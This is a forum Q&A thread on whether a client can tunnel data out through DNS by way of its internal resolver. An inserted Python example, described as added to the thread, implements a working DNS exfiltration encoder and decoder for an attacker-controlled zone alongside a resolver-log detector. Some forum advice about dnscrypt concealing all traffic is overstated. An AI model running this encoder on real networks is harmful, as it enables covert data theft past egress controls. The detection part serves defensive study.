trojan81

asked on

DNS tunneling

Experts,

This question is in regard to DNS tunneling, the abuse of the DNS protocol to exfiltrate data.

Assume Windows client 10.1.1.1 is able to reach its internal DNS server 10.2.2.2 over DNS.  Only the DNS server is permitted to talk to the internet over DNS.  The client will be blocked from talking DNS out to the internet.

In my example above, would the client still be able to do DNS tunneling by relaying it through DNS server 10.2.2.2?
Mahesh

No.
The client will have either HTTP/HTTPS or some other specific port such as 5061 etc. access towards the internet, and not DNS traffic (TCP/UDP 53).
In terms of DNS, the client will end up at the local DNS server.
Dr. Klahn

I don't see why not.  The payload for a DNS tunneling exploit is in the FQDN being resolved.

10.1.1.1 requests a DNS lookup for thisismysecretdata24681357.nowhere.com.  Assuming that 10.2.2.2 does not have this FQDN cached, the local DNS server will pass the request out through the firewall to the internet for resolution.  There it will be just another UDP packet that can be sniffed or intercepted.  Once that packet is on the internet anybody can capture it if they have physical access to the cable or software access to any of the intervening nodes.
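The following Python is an added example, not code from the original thread, that models the point made above: the tunneling client never needs outbound port 53 itself, because the payload rides in the query name, and a recursive resolver such as 10.2.2.2 forwards that name upstream unchanged (every name is unique, so its cache never helps). It encodes a constructed payload into RFC 1035-sized labels under an assumed attacker-controlled zone `exfil.example`, decodes it as the zone's authoritative server would, and runs a simple per-domain detector of the kind you would point at the internal resolver's query log. The zone name, the payload, the benign sample queries and the detection thresholds are all constructed for illustration.

```python
import base64
import hashlib
import math
from collections import Counter

MAX_LABEL = 63            # RFC 1035: one label is at most 63 octets
MAX_NAME = 253            # practical maximum for a name in presentation form
LABELS_PER_QUERY = 3      # payload labels carried by each query name
ZONE = "exfil.example"    # assumed attacker-controlled zone (constructed, not from the page)

# Constructed stand-in for a stolen file: 4 KiB of deterministic pseudo-random bytes.
PAYLOAD = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(128))

# Constructed benign resolver traffic for comparison.
BENIGN_QUERIES = [
    "www.example.com", "mail.example.com", "login.example.com", "update.example.com",
    "cdn.example.net", "static.example.net", "api.example.org", "time.example.org",
]


def encode_queries(data: bytes, zone: str = ZONE) -> list[str]:
    """Return the FQDNs a tunneling client would ask its internal resolver for.

    The payload is Base32-encoded (DNS names are case-insensitive, so Base64
    is unsafe), cut into 63-character labels, and prefixed with a hex sequence
    label so the receiver can reorder queries that arrive out of order.
    """
    text = base64.b32encode(data).decode().rstrip("=").lower()
    chunk_len = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, off in enumerate(range(0, len(text), chunk_len)):
        chunk = text[off:off + chunk_len]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, zone])
        assert len(name) <= MAX_NAME, "zone too long for this label layout"
        names.append(name)
    return names


def decode_queries(names: list[str], zone: str = ZONE) -> bytes:
    """Reassemble the payload from the names that reach the zone's authoritative
    server, i.e. exactly what the internal recursive resolver forwarded upstream."""
    suffix = "." + zone
    chunks = {}
    for name in names:
        if not name.lower().endswith(suffix):
            continue
        seq, *labels = name[: -len(suffix)].split(".")
        chunks[int(seq, 16)] = "".join(labels)
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    text += "=" * (-len(text) % 8)          # restore the Base32 padding we stripped
    return base64.b32decode(text)


def shannon_entropy(s: str) -> float:
    """Bits per character; Base32 payload approaches 5, human hostnames sit far lower."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(name: str) -> str:
    """Crude: treat the last two labels as the registered domain (a public-suffix
    list would do this properly)."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def flag_tunnel_domains(queries, min_distinct=20, min_avg_sub_len=40, min_avg_entropy=3.5):
    """Score what a resolver log shows: many distinct, long, high-entropy subdomains
    under one registered domain is the classic tunnel signature. Thresholds are
    illustrative and must be tuned against a site's own baseline."""
    names_by_domain: dict[str, set[str]] = {}
    for q in queries:
        names_by_domain.setdefault(registered_domain(q), set()).add(q.lower())
    flagged = set()
    for domain, names in names_by_domain.items():
        if len(names) < min_distinct:
            continue
        subs = ["".join(n.split(".")[:-2]) for n in names]
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s) for s in subs) / len(subs)
        if avg_len >= min_avg_sub_len and avg_ent >= min_avg_entropy:
            flagged.add(domain)
    return flagged


if __name__ == "__main__":
    tunnel = encode_queries(PAYLOAD)
    print(f"{len(tunnel)} queries, first: {tunnel[0]}")
    print("round trip ok:", decode_queries(tunnel) == PAYLOAD)
    print("flagged:", flag_tunnel_domains(tunnel + BENIGN_QUERIES))
```

Two practical notes. First, encrypting either hop (client to resolver, or resolver to its forwarders) does not change the outcome: the zone's authoritative server still receives the full query name, so the control has to be detection on the resolver's query logs or response-policy filtering at the resolver, not perimeter port blocking alone. Second, the heuristic above will also light up on legitimate services that encode data in hostnames (CDN hashes, anti-malware lookups, some telemetry), so the thresholds and an allow-list need tuning against real traffic before alerting on them.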
I think you're mixing up what DNS tunneling + normal DNS forward mean.

What you've described is a simple, plain vanilla, DNS setup. No tunneling.

Your 10.2.2.2 server will have forwarders set like 1.1.1.1 + 8.8.8.8 + 8.8.4.4 + likely you'll run this on some random port, like 10053.

Then your clients, like 10.1.1.1, will connect to 10.2.2.2:10053 + your internal firewall will only allow 10.2.2.2 to talk UDP/TCP:53 + all other machine requests for UDP/TCP:53 will be blocked.

ASKER

I understand the difference. I am just describing a customer setup and asking if DNS data ex-filtration can occur in that scenario.
You can never block 100% of data discovery, 100% of the time.

And the answer to your question relates to what data you're trying to keep hidden.

This is a complex question.

Likely best to hire someone to audit your DNS + setup a system which meets your requirements.

That said, here's a nifty trick which does a very good job of hiding most DNS data at a level which is very difficult for anyone to scrape.

1) On all your clients run dnsmasq, listening on 127.0.0.1:53 which will provide fast + cached lookups.

2) Run dnscrypt, listed in your dnsmasq config file as the only forwarder.

3) dnscrypt will then convert all UDP + TCP port 53 requests to secure TCP over some other port (not port 53).

4) Block UDP + TCP port 53 communication across your entire enterprise.

Many of my clients use this setup.

I use this setup even at home, as it completely occludes all DNS traffic.

For anyone to scrape this traffic, they'd have to know all outgoing IPs the dnscrypt service uses... scrape all data from all IPs + then try to guess which DNS lookups your enterprise was making. They'd have to do this by injecting some sort of Malware inside your network to access some random, hashed, 100% unique IP... to have enough data to process dnscrypt scraping.

Likely dnsmasq + dnscrypt is what you're looking for as a cheap + fast way to occlude all your DNS traffic.
ASKER CERTIFIED SOLUTION
DrDave242